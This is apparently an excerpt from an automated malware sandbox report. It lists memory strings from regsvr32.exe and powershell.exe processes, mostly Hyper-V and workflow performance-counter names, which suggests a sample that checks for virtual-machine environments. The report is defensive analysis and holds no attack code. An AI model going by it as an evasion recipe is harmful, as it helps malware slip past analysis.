Instructions/sec5030Emulated Instructions Cost5032Debug Register Accesses/sec5034Debug Register Acce
Source: powershell.exe, 00000011.00000002.2009636665.0000000007862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMSFT_NetEventVmNetworkAdatper.format.ps1xml
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2Hyper-V VM Vid Partition
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Virtual Machine Bus Pipesh
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V mqabcqtdeleiepv Busw
Source: regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor\X
Source: regsvr32.exe, 0000000E.00000003.1943302476.0000000002D60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partitionll
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Virtual Processor
Source: powershell.exe, 00000011.00000002.1982918321.0000000005319000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partition
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partitionl
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Virtual Machine Bus PipesZ
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partition
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Hypervisor Root Partition
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor
Source: regsvr32.exe, 0000000E.00000003.1917333141.0000000002D49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost_
Source: regsvr32.exe, 00000007.00000003.1733544491.0000000002890000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1741891317.0000000002890000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1743831001.0000000002890000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1739588798.0000000002890000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1728667072.0000000002890000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824I
Source: regsvr32.exe, 00000007.00000003.1759503664.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1758105092.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1758205297.000000000418C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot&
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partitionll6
Source: regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid PartitionT
Source: regsvr32.exe, 00000007.00000003.1885973380.0000000005000000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.000000000548C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025831243.0000000002C8D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2025223425.0000000002C8B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.0000000005495000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration ServiceZ
Source: regsvr32.exe, 00000007.00000003.1885973380.0000000005000000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.000000000548C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025831243.0000000002C7A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.0000000005495000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipess
Source: regsvr32.exe, 00000007.00000003.1885973380.000000000505B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Virtual Machine Bus PipesB
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipes
Source: powershell.exe, 00000011.00000002.1982918321.0000000005319000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
Source: regsvr32.exe, 00000007.00000003.1885973380.000000000505B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V mqabcqtdeleiepv BusF
Source: regsvr32.exe, 0000000E.00000003.1943264950.00000000046B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost_
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processorh
Source: regsvr32.exe, 00000007.00000003.1885973380.000000000505B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Hypervisor Root PartitionQ
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processor
Source: regsvr32.exe, 0000000E.00000003.1917102815.0000000002D29000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1943159264.00000000046B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB F
Source: regsvr32.exe, 0000000E.00000003.1943562354.00000000046B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: /sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost
